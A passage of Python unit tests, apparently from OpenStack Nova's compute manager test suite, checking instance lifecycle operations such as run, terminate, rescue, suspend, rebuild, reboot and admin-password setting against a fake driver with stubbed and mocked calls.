the instance goes to ERROR state, keeping the task state
"""
def fake(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(nova.compute.manager.ComputeManager,
'_prep_block_device', fake)
instance = self._create_fake_instance()
self.assertRaises(test.TestingException, self.compute.run_instance,
self.context, instance=instance)
#check state is failed even after the periodic poll
self._assert_state({'vm_state': vm_states.ERROR,
'task_state': None})
self.compute.periodic_tasks(context.get_admin_context())
self._assert_state({'vm_state': vm_states.ERROR,
'task_state': None})
def test_run_instance_spawn_fail(self):
"""spawn failure test.
Make sure that when there is a spawning problem,
the instance goes to ERROR state, keeping the task state.
"""
def fake(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.compute.driver, 'spawn', fake)
instance = self._create_fake_instance()
self.assertRaises(test.TestingException, self.compute.run_instance,
self.context, instance=instance)
#check state is failed even after the periodic poll
self._assert_state({'vm_state': vm_states.ERROR,
'task_state': None})
self.compute.periodic_tasks(context.get_admin_context())
self._assert_state({'vm_state': vm_states.ERROR,
'task_state': None})
def test_run_instance_dealloc_network_instance_not_found(self):
"""spawn network deallocate test.
Make sure that when an instance is not found during spawn
that the network is deallocated
"""
instance = self._create_fake_instance()
def fake(*args, **kwargs):
raise exception.InstanceNotFound(instance_id="fake")
self.stubs.Set(self.compute.driver, 'spawn', fake)
self.mox.StubOutWithMock(self.compute, '_deallocate_network')
self.compute._deallocate_network(mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
self.compute.run_instance(self.context, instance=instance)
def test_run_instance_bails_on_missing_instance(self):
# Make sure that run_instance() will quickly ignore a deleted instance
called = {}
instance = self._create_fake_instance()
def fake_instance_update(self, *a, **args):
called['instance_update'] = True
raise exception.InstanceNotFound(instance_id='foo')
self.stubs.Set(self.compute, '_instance_update', fake_instance_update)
self.compute.run_instance(self.context, instance)
self.assertIn('instance_update', called)
def test_run_instance_bails_on_missing_instance_2(self):
# Make sure that run_instance() will quickly ignore a deleted instance
called = {}
instance = self._create_fake_instance()
def fake_default_block_device_names(self, *a, **args):
called['default_block_device_names'] = True
raise exception.InstanceNotFound(instance_id='foo')
self.stubs.Set(self.compute, '_default_block_device_names',
fake_default_block_device_names)
self.compute.run_instance(self.context, instance)
self.assertIn('default_block_device_names', called)
def test_can_terminate_on_error_state(self):
# Make sure that the instance can be terminated in ERROR state.
#check failed to schedule --> terminate
params = {'vm_state': vm_states.ERROR}
instance = self._create_fake_instance(params=params)
self.compute.terminate_instance(self.context, instance=instance)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
self.context, instance['uuid'])
# Double check it's not there for admins, either.
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
self.context.elevated(), instance['uuid'])
def test_run_terminate(self):
# Make sure it is possible to run and terminate instance.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("Running instances: %s"), instances)
self.assertEqual(len(instances), 1)
self.compute.terminate_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("After terminating instances: %s"), instances)
self.assertEqual(len(instances), 0)
admin_deleted_context = context.get_admin_context(
read_deleted="only")
instance = db.instance_get_by_uuid(admin_deleted_context,
instance['uuid'])
self.assertEqual(instance['vm_state'], vm_states.DELETED)
self.assertEqual(instance['task_state'], None)
def test_run_terminate_with_vol_attached(self):
"""Make sure it is possible to run and terminate instance with volume
attached
"""
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("Running instances: %s"), instances)
self.assertEqual(len(instances), 1)
def fake_check_attach(*args, **kwargs):
pass
def fake_reserve_volume(*args, **kwargs):
pass
def fake_volume_get(self, context, volume_id):
return {'id': volume_id}
def fake_rpc_reserve_block_device_name(self, context, **kwargs):
pass
self.stubs.Set(cinder.API, 'get', fake_volume_get)
self.stubs.Set(cinder.API, 'check_attach', fake_check_attach)
self.stubs.Set(cinder.API, 'reserve_volume',
fake_reserve_volume)
self.stubs.Set(compute_rpcapi.ComputeAPI,
'reserve_block_device_name',
fake_rpc_reserve_block_device_name)
self.compute_api.attach_volume(self.context, instance, 1,
'/dev/vdc')
self.compute.terminate_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("After terminating instances: %s"), instances)
self.assertEqual(len(instances), 0)
bdms = db.block_device_mapping_get_all_by_instance(self.context,
instance['uuid'])
self.assertEqual(len(bdms), 0)
def test_run_terminate_no_image(self):
"""
Make sure instance started without image (from volume)
can be termintad without issues
"""
params = {'image_ref': ''}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance)
self._assert_state({'vm_state': vm_states.ACTIVE,
'task_state': None})
self.compute.terminate_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
self.assertEqual(len(instances), 0)
def test_terminate_no_network(self):
# This is as reported in LP bug 1008875
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("Running instances: %s"), instances)
self.assertEqual(len(instances), 1)
# Make it look like this is no instance
self.mox.StubOutWithMock(self.compute, '_get_instance_nw_info')
self.compute._get_instance_nw_info(
mox.IgnoreArg(),
mox.IgnoreArg()).AndRaise(
exception.NetworkNotFound(network_id='fake')
)
self.mox.ReplayAll()
self.compute.terminate_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("After terminating instances: %s"), instances)
self.assertEqual(len(instances), 0)
def test_terminate_no_fixed_ips(self):
# This is as reported in LP bug 1192893
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("Running instances: %s"), instances)
self.assertEqual(len(instances), 1)
self.mox.StubOutWithMock(self.compute, '_get_instance_nw_info')
self.compute._get_instance_nw_info(
mox.IgnoreArg(),
mox.IgnoreArg()).AndRaise(
exception.NoMoreFixedIps()
)
self.mox.ReplayAll()
self.compute.terminate_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("After terminating instances: %s"), instances)
self.assertEqual(len(instances), 0)
def test_run_terminate_timestamps(self):
# Make sure timestamps are set for launched and destroyed.
instance = jsonutils.to_primitive(self._create_fake_instance())
instance['launched_at'] = None
self.assertEqual(instance['launched_at'], None)
self.assertEqual(instance['deleted_at'], None)
launch = timeutils.utcnow()
self.compute.run_instance(self.context, instance=instance)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertTrue(instance['launched_at'] > launch)
self.assertEqual(instance['deleted_at'], None)
terminate = timeutils.utcnow()
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
with utils.temporary_mutation(self.context, read_deleted='only'):
instance = db.instance_get_by_uuid(self.context,
instance['uuid'])
self.assertTrue(instance['launched_at'] < terminate)
self.assertTrue(instance['deleted_at'] > terminate)
def test_run_terminate_deallocate_net_failure_sets_error_state(self):
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("Running instances: %s"), instances)
self.assertEqual(len(instances), 1)
def _fake_deallocate_network(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.compute, '_deallocate_network',
_fake_deallocate_network)
try:
self.compute.terminate_instance(self.context, instance=instance)
except test.TestingException:
pass
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(instance['vm_state'], vm_states.ERROR)
def test_stop(self):
# Ensure instance can be stopped.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.POWERING_OFF})
inst_uuid = instance['uuid']
extra = ['system_metadata', 'metadata']
inst_obj = instance_obj.Instance.get_by_uuid(self.context,
inst_uuid,
expected_attrs=extra)
self.compute.stop_instance(self.context, instance=inst_obj)
self.compute.terminate_instance(self.context, instance=instance)
def test_start(self):
# Ensure instance can be started.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.POWERING_OFF})
extra = ['system_metadata', 'metadata']
inst_uuid = instance['uuid']
inst_obj = instance_obj.Instance.get_by_uuid(self.context,
inst_uuid,
expected_attrs=extra)
self.compute.stop_instance(self.context, instance=inst_obj)
inst_obj.task_state = task_states.POWERING_ON
inst_obj.save(self.context)
self.compute.start_instance(self.context, instance=inst_obj)
self.compute.terminate_instance(self.context, instance=instance)
def test_stop_start_no_image(self):
params = {'image_ref': ''}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.POWERING_OFF})
extra = ['system_metadata', 'metadata']
inst_uuid = instance['uuid']
inst_obj = instance_obj.Instance.get_by_uuid(self.context,
inst_uuid,
expected_attrs=extra)
self.compute.stop_instance(self.context, instance=inst_obj)
inst_obj.task_state = task_states.POWERING_ON
inst_obj.save(self.context)
self.compute.start_instance(self.context, instance=inst_obj)
self.compute.terminate_instance(self.context, instance=instance)
def test_rescue(self):
# Ensure instance can be rescued and unrescued.
called = {'rescued': False,
'unrescued': False}
def fake_rescue(self, context, instance_ref, network_info, image_meta,
rescue_password):
called['rescued'] = True
self.stubs.Set(nova.virt.fake.FakeDriver, 'rescue', fake_rescue)
def fake_unrescue(self, instance_ref, network_info):
called['unrescued'] = True
self.stubs.Set(nova.virt.fake.FakeDriver, 'unrescue',
fake_unrescue)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance_uuid,
{"task_state": task_states.RESCUING})
self.compute.rescue_instance(self.context, instance=instance)
self.assertTrue(called['rescued'])
db.instance_update(self.context, instance_uuid,
{"task_state": task_states.UNRESCUING})
self.compute.unrescue_instance(self.context, instance=instance)
self.assertTrue(called['unrescued'])
self.compute.terminate_instance(self.context, instance=instance)
def test_rescue_notifications(self):
# Ensure notifications on instance rescue.
def fake_rescue(self, context, instance_ref, network_info, image_meta,
rescue_password):
pass
self.stubs.Set(nova.virt.fake.FakeDriver, 'rescue', fake_rescue)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
fake_notifier.NOTIFICATIONS = []
db.instance_update(self.context, instance_uuid,
{"task_state": task_states.RESCUING})
self.compute.rescue_instance(self.context, instance=instance)
expected_notifications = ['compute.instance.exists',
'compute.instance.rescue.start',
'compute.instance.rescue.end']
self.assertEquals([m.event_type for m in fake_notifier.NOTIFICATIONS],
expected_notifications)
for n, msg in enumerate(fake_notifier.NOTIFICATIONS):
self.assertEquals(msg.event_type, expected_notifications[n])
self.assertEquals(msg.priority, 'INFO')
payload = msg.payload
self.assertEquals(payload['tenant_id'], self.project_id)
self.assertEquals(payload['user_id'], self.user_id)
self.assertEquals(payload['instance_id'], instance_uuid)
self.assertEquals(payload['instance_type'], 'm1.tiny')
type_id = flavors.get_flavor_by_name('m1.tiny')['id']
self.assertEquals(str(payload['instance_type_id']), str(type_id))
self.assertTrue('display_name' in payload)
self.assertTrue('created_at' in payload)
self.assertTrue('launched_at' in payload)
image_ref_url = glance.generate_image_url(FAKE_IMAGE_REF)
self.assertEquals(payload['image_ref_url'], image_ref_url)
msg = fake_notifier.NOTIFICATIONS[1]
self.assertTrue('rescue_image_name' in msg.payload)
self.compute.terminate_instance(self.context, instance=instance)
def test_unrescue_notifications(self):
# Ensure notifications on instance rescue.
def fake_unrescue(self, instance_ref, network_info):
pass
self.stubs.Set(nova.virt.fake.FakeDriver, 'unrescue',
fake_unrescue)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
fake_notifier.NOTIFICATIONS = []
db.instance_update(self.context, instance_uuid,
{"task_state": task_states.UNRESCUING})
self.compute.unrescue_instance(self.context, instance=instance)
expected_notifications = ['compute.instance.unrescue.start',
'compute.instance.unrescue.end']
self.assertEquals([m.event_type for m in fake_notifier.NOTIFICATIONS],
expected_notifications)
for n, msg in enumerate(fake_notifier.NOTIFICATIONS):
self.assertEquals(msg.event_type, expected_notifications[n])
self.assertEquals(msg.priority, 'INFO')
payload = msg.payload
self.assertEquals(payload['tenant_id'], self.project_id)
self.assertEquals(payload['user_id'], self.user_id)
self.assertEquals(payload['instance_id'], instance_uuid)
self.assertEquals(payload['instance_type'], 'm1.tiny')
type_id = flavors.get_flavor_by_name('m1.tiny')['id']
self.assertEquals(str(payload['instance_type_id']), str(type_id))
self.assertTrue('display_name' in payload)
self.assertTrue('created_at' in payload)
self.assertTrue('launched_at' in payload)
image_ref_url = glance.generate_image_url(FAKE_IMAGE_REF)
self.assertEquals(payload['image_ref_url'], image_ref_url)
self.compute.terminate_instance(self.context, instance=instance)
def test_rescue_handle_err(self):
# If the driver fails to rescue, instance state should remain the same
# and the exception should be converted to InstanceNotRescuable
instance = jsonutils.to_primitive(self._create_fake_instance())
self.mox.StubOutWithMock(self.compute, '_get_rescue_image')
self.mox.StubOutWithMock(nova.virt.fake.FakeDriver, 'rescue')
self.compute._get_rescue_image(
mox.IgnoreArg(), instance).AndReturn({})
nova.virt.fake.FakeDriver.rescue(
mox.IgnoreArg(), instance, [], mox.IgnoreArg(), 'password'
).AndRaise(RuntimeError("Try again later"))
self.mox.ReplayAll()
expected_message = ('Instance %s cannot be rescued: '
'Driver Error: Try again later' % instance['uuid'])
instance['vm_state'] = 'some_random_state'
with testtools.ExpectedException(
exception.InstanceNotRescuable, expected_message):
self.compute.rescue_instance(
self.context, instance=instance,
rescue_password='password')
self.assertEqual('some_random_state', instance['vm_state'])
def test_power_on(self):
# Ensure instance can be powered on.
called = {'power_on': False}
def fake_driver_power_on(self, context, instance, network_info,
block_device_info):
called['power_on'] = True
self.stubs.Set(nova.virt.fake.FakeDriver, 'power_on',
fake_driver_power_on)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
extra = ['system_metadata', 'metadata']
inst_obj = instance_obj.Instance.get_by_uuid(self.context,
instance['uuid'],
expected_attrs=extra)
inst_obj.task_state = task_states.POWERING_ON
inst_obj.save(self.context)
self.compute.start_instance(self.context, instance=inst_obj)
self.assertTrue(called['power_on'])
self.compute.terminate_instance(self.context, instance=inst_obj)
def test_power_off(self):
# Ensure instance can be powered off.
called = {'power_off': False}
def fake_driver_power_off(self, instance):
called['power_off'] = True
self.stubs.Set(nova.virt.fake.FakeDriver, 'power_off',
fake_driver_power_off)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
extra = ['system_metadata', 'metadata']
inst_obj = instance_obj.Instance.get_by_uuid(self.context,
instance['uuid'],
expected_attrs=extra)
inst_obj.task_state = task_states.POWERING_OFF
inst_obj.save(self.context)
self.compute.stop_instance(self.context, instance=inst_obj)
self.assertTrue(called['power_off'])
self.compute.terminate_instance(self.context, instance=inst_obj)
def test_pause(self):
# Ensure instance can be paused and unpaused.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.PAUSING})
fake_notifier.NOTIFICATIONS = []
self.compute.pause_instance(self.context, instance=instance)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'compute.instance.pause.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'compute.instance.pause.end')
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.UNPAUSING})
fake_notifier.NOTIFICATIONS = []
self.compute.unpause_instance(self.context, instance=instance)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'compute.instance.unpause.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'compute.instance.unpause.end')
self.compute.terminate_instance(self.context, instance=instance)
def test_suspend(self):
# ensure instance can be suspended and resumed.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.SUSPENDING})
self.compute.suspend_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.RESUMING})
self.compute.resume_instance(self.context, instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_suspend_error(self):
# Ensure vm_state is ERROR when suspend error occurs.
def fake(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.compute.driver, 'suspend', fake)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(test.TestingException,
self.compute.suspend_instance,
self.context,
instance=instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['vm_state'], vm_states.ERROR)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
def test_suspend_not_implemented(self):
# Ensure expected exception is raised and the vm_state of instance
# restore to original value if suspend is not implemented by driver
def fake(*args, **kwargs):
raise NotImplementedError('suspend test')
self.stubs.Set(self.compute.driver, 'suspend', fake)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_state = instance['vm_state']
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(NotImplementedError,
self.compute.suspend_instance,
self.context,
instance=instance)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(instance_state, instance['vm_state'])
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
def test_rebuild(self):
# Ensure instance can be rebuilt.
instance = jsonutils.to_primitive(self._create_fake_instance())
image_ref = instance['image_ref']
sys_metadata = db.instance_system_metadata_get(self.context,
instance['uuid'])
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.REBUILDING})
self.compute.rebuild_instance(self.context, instance,
image_ref, image_ref,
injected_files=[],
new_pass="new_password",
orig_sys_metadata=sys_metadata,
bdms=[])
self.compute.terminate_instance(self.context, instance=instance)
def test_rebuild_no_image(self):
# Ensure instance can be rebuilt when started with no image.
params = {'image_ref': ''}
instance = self._create_fake_instance(params)
sys_metadata = db.instance_system_metadata_get(self.context,
instance['uuid'])
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.REBUILDING})
self.compute.rebuild_instance(self.context, instance,
'', '', injected_files=[],
new_pass="new_password",
orig_sys_metadata=sys_metadata)
self.compute.terminate_instance(self.context, instance=instance)
def test_rebuild_launched_at_time(self):
# Ensure instance can be rebuilt.
old_time = datetime.datetime(2012, 4, 1)
cur_time = datetime.datetime(2012, 12, 21, 12, 21)
timeutils.set_time_override(old_time)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
image_ref = instance['image_ref']
self.compute.run_instance(self.context, instance=instance)
timeutils.set_time_override(cur_time)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.REBUILDING})
self.compute.rebuild_instance(self.context, instance,
image_ref, image_ref,
injected_files=[],
new_pass="new_password",
bdms=[])
instance = db.instance_get_by_uuid(self.context, instance_uuid,)
self.assertEquals(cur_time, instance['launched_at'])
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
def test_rebuild_with_injected_files(self):
# Ensure instance can be rebuilt with injected files.
injected_files = [
('/a/b/c', base64.b64encode('foobarbaz')),
]
self.decoded_files = [
('/a/b/c', 'foobarbaz'),
]
def _spawn(context, instance, image_meta, injected_files,
admin_password, network_info, block_device_info):
self.assertEqual(self.decoded_files, injected_files)
self.stubs.Set(self.compute.driver, 'spawn', _spawn)
instance = jsonutils.to_primitive(self._create_fake_instance())
image_ref = instance['image_ref']
sys_metadata = db.instance_system_metadata_get(self.context,
instance['uuid'])
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.REBUILDING})
self.compute.rebuild_instance(self.context, instance,
image_ref, image_ref,
injected_files=injected_files,
new_pass="new_password",
orig_sys_metadata=sys_metadata,
bdms=[])
self.compute.terminate_instance(self.context, instance=instance)
def _test_reboot(self, soft,
test_delete=False, test_unrescue=False,
fail_reboot=False, fail_running=False):
# This is a true unit test, so we don't need the network stubs.
fake_network.unset_stub_network_methods(self.stubs)
self.mox.StubOutWithMock(self.compute,
'_get_instance_volume_block_device_info')
self.mox.StubOutWithMock(self.compute, '_get_instance_nw_info')
self.mox.StubOutWithMock(self.compute, '_notify_about_instance_usage')
self.mox.StubOutWithMock(self.compute, '_instance_update')
self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
self.mox.StubOutWithMock(self.compute, '_get_power_state')
self.mox.StubOutWithMock(self.compute.driver, 'reboot')
# FIXME(comstud): I don't feel like the context needs to
# be elevated at all. Hopefully remove elevated from
# reboot_instance and remove the stub here in a future patch.
# econtext would just become self.context below then.
econtext = self.context.elevated()
db_instance = fake_instance.fake_db_instance(
**dict(uuid='fake-instance',
power_state=power_state.NOSTATE,
vm_state=vm_states.ACTIVE,
launched_at=timeutils.utcnow()))
instance = instance_obj.Instance._from_db_object(
econtext, instance_obj.Instance(), db_instance)
updated_dbinstance1 = fake_instance.fake_db_instance(
**dict(uuid='updated-instance1',
power_state=10003,
vm_state=vm_states.ACTIVE,
launched_at=timeutils.utcnow()))
updated_dbinstance2 = fake_instance.fake_db_instance(
**dict(uuid='updated-instance2',
power_state=10003,
vm_state=vm_states.ACTIVE,
launched_at=timeutils.utcnow()))
if test_unrescue:
instance['vm_state'] = vm_states.RESCUED
instance.obj_reset_changes()
fake_nw_model = network_model.NetworkInfo()
fake_block_dev_info = 'fake_block_dev_info'
fake_power_state1 = 10001
fake_power_state2 = power_state.RUNNING
fake_power_state3 = 10002
reboot_type = soft and 'SOFT' or 'HARD'
# Beginning of calls we expect.
self.mox.StubOutWithMock(self.context, 'elevated')
self.context.elevated().AndReturn(econtext)
self.compute._get_instance_volume_block_device_info(
econtext, instance).AndReturn(fake_block_dev_info)
self.compute._get_instance_nw_info(econtext,
instance).AndReturn(
fake_nw_model)
self.compute._notify_about_instance_usage(econtext,
instance,
'reboot.start')
self.compute._get_power_state(econtext,
instance).AndReturn(fake_power_state1)
db.instance_update_and_get_original(econtext, instance['uuid'],
{'power_state': fake_power_state1},
update_cells=False,
columns_to_join=[],
).AndReturn((None,
updated_dbinstance1))
expected_nw_info = fake_nw_model
# Annoying. driver.reboot is wrapped in a try/except, and
# doesn't re-raise. It eats exception generated by mox if
# this is called with the wrong args, so we have to hack
# around it.
reboot_call_info = {}
expected_call_info = {
'args': (econtext, instance, expected_nw_info,
reboot_type),
'kwargs': {'block_device_info': fake_block_dev_info}}
def fake_reboot(*args, **kwargs):
reboot_call_info['args'] = args
reboot_call_info['kwargs'] = kwargs
# NOTE(sirp): Since `bad_volumes_callback` is a function defined
# within `reboot_instance`, we don't have access to its value and
# can't stub it out, thus we skip that comparison.
kwargs.pop('bad_volumes_callback')
if fail_reboot:
raise exception.InstanceNotFound(instance_id='instance-0000')
self.stubs.Set(self.compute.driver, 'reboot', fake_reboot)
# Power state should be updated again
if not fail_reboot or fail_running:
new_power_state = fake_power_state2
self.compute._get_power_state(econtext,
instance).AndReturn(fake_power_state2)
else:
new_power_state = fake_power_state3
self.compute._get_power_state(econtext,
instance).AndReturn(fake_power_state3)
if test_delete:
db.instance_update_and_get_original(
econtext, updated_dbinstance1['uuid'],
{'power_state': new_power_state,
'task_state': None,
'vm_state': vm_states.ACTIVE},
update_cells=False,
columns_to_join=[],
).AndRaise(exception.InstanceNotFound(
instance_id=instance['uuid']))
self.compute._notify_about_instance_usage(
econtext,
instance,
'reboot.end')
elif fail_reboot and not fail_running:
db.instance_update_and_get_original(
econtext, updated_dbinstance1['uuid'],
{'vm_state': vm_states.ERROR},
update_cells=False,
columns_to_join=[],
).AndRaise(exception.InstanceNotFound(
instance_id=instance['uuid']))
else:
db.instance_update_and_get_original(
econtext, updated_dbinstance1['uuid'],
{'power_state': new_power_state,
'task_state': None,
'vm_state': vm_states.ACTIVE},
update_cells=False,
columns_to_join=[],
).AndReturn((None, updated_dbinstance2))
self.compute._notify_about_instance_usage(
econtext,
instance,
'reboot.end')
self.mox.ReplayAll()
if not fail_reboot or fail_running:
self.compute.reboot_instance(self.context, instance=instance,
block_device_info=None,
reboot_type=reboot_type)
else:
self.assertRaises(exception.InstanceNotFound,
self.compute.reboot_instance,
self.context, instance=instance,
block_device_info=None,
reboot_type=reboot_type)
self.assertEqual(expected_call_info, reboot_call_info)
def test_reboot_soft(self):
self._test_reboot(True)
def test_reboot_soft_and_delete(self):
self._test_reboot(True, True)
def test_reboot_soft_and_rescued(self):
self._test_reboot(True, False, True)
def test_reboot_soft_and_delete_and_rescued(self):
self._test_reboot(True, True, True)
def test_reboot_hard(self):
self._test_reboot(False)
def test_reboot_hard_and_delete(self):
self._test_reboot(False, True)
def test_reboot_hard_and_rescued(self):
self._test_reboot(False, False, True)
def test_reboot_hard_and_delete_and_rescued(self):
self._test_reboot(False, True, True)
def test_reboot_fail(self):
self._test_reboot(False, fail_reboot=True)
def test_reboot_fail_running(self):
self._test_reboot(False, fail_reboot=True,
fail_running=True)
def test_set_admin_password(self):
# Ensure instance can have its admin password set.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{'task_state': task_states.UPDATING_PASSWORD})
inst_ref = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(inst_ref['vm_state'], vm_states.ACTIVE)
self.assertEqual(inst_ref['task_state'], task_states.UPDATING_PASSWORD)
self.compute.set_admin_password(self.context, instance=instance)
inst_ref = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(inst_ref['vm_state'], vm_states.ACTIVE)
self.assertEqual(inst_ref['task_state'], None)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(inst_ref))
def test_set_admin_password_bad_state(self):
# Test setting password while instance is rebuilding.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'], {
"power_state": power_state.NOSTATE,
})
instance = jsonutils.to_primitive(db.instance_get_by_uuid(
self.context, instance['uuid']))
self.assertEqual(instance['power_state'], power_state.NOSTATE)
def fake_driver_get_info(self2, _instance):
return {'state': power_state.NOSTATE,
'max_mem': 0,
'mem': 0,
'num_cpu': 2,
'cpu_time': 0}
self.stubs.Set(nova.virt.fake.FakeDriver, 'get_info',
fake_driver_get_info)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.UPDATING_PASSWORD})
self.assertRaises(exception.InstancePasswordSetFailed,
self.compute.set_admin_password,
self.context,
instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def _do_test_set_admin_password_driver_error(self, exc, expected_vm_state,
expected_task_state,
expected_exception):
"""Ensure expected exception is raised if set_admin_password fails."""
def fake_sleep(_time):
pass
self.stubs.Set(time, 'sleep', fake_sleep)
def fake_driver_set_pass(self2, _instance, _pwd):
raise exc
self.stubs.Set(nova.virt.fake.FakeDriver, 'set_admin_password',
fake_driver_set_pass)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{'task_state': task_states.UPDATING_PASSWORD})
inst_ref = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(inst_ref['vm_state'], vm_states.ACTIVE)
self.assertEqual(inst_ref['task_state'], task_states.UPDATING_PASSWORD)
#error raised from the driver should not reveal internal information
#so a new error is raised
self.assertRaises(expected_exception,
self.compute.set_admin_password,
self.context,
instance=jsonutils.to_primitive(inst_ref))
inst_ref = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(inst_ref['vm_state'], expected_vm_state)
self.assertEqual(inst_ref['task_state'], expected_task_state)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(inst_ref))
def test_set_admin_password_driver_not_authorized(self):
"""
Ensure expected exception is raised if set_admin_password not
authorized.
"""
exc = exception.NotAuthorized(_('Internal error'))
expected_exception = exception.InstancePasswordSetFailed
self._do_test_set_admin_password_driver_error(exc,
vm_states.ERROR,
None,
expected_exception)
def test_set_admin_password_driver_not_implemented(self):
"""
Ensure expected exception is raised if set_admin_password not
implemented by driver.
"""
exc = NotImplementedError()
expected_exception = NotImplementedError
self._do_test_set_admin_password_driver_error(exc,
vm_states.ACTIVE,
None,
expected_exception)
def test_inject_file(self):
# Ensure we can write a file to an instance.
called = {'inject': False}
def fake_driver_inject_file(self2, instance, path, contents):
self.assertEqual(path, "/tmp/test")
self.assertEqual(contents, "File Contents")
called['inject'] = True
self.stubs.Set(nova.virt.fake.FakeDriver, 'inject_file',
fake_driver_inject_file)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.compute.inject_file(self.context, "/tmp/test",
"File Contents", instance=instance)
self.assertTrue(called['inject'])
self.compute.terminate_instance(self.context, instance=instance)
def test_inject_network_info(self):
# Ensure we can inject network info.
called = {'inject': False}
def fake_driver_inject_network(self, instance, network_info):
called['inject'] = True
self.stubs.Set(nova.virt.fake.FakeDriver, 'inject_network_info',
fake_driver_inject_network)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
inst_obj = self._objectify(instance)
self.compute.inject_network_info(self.context, instance=inst_obj)
self.assertTrue(called['inject'])
self.compute.terminate_instance(self.context, instance=instance)
def test_reset_network(self):
# Ensure we can reset networking on an instance.
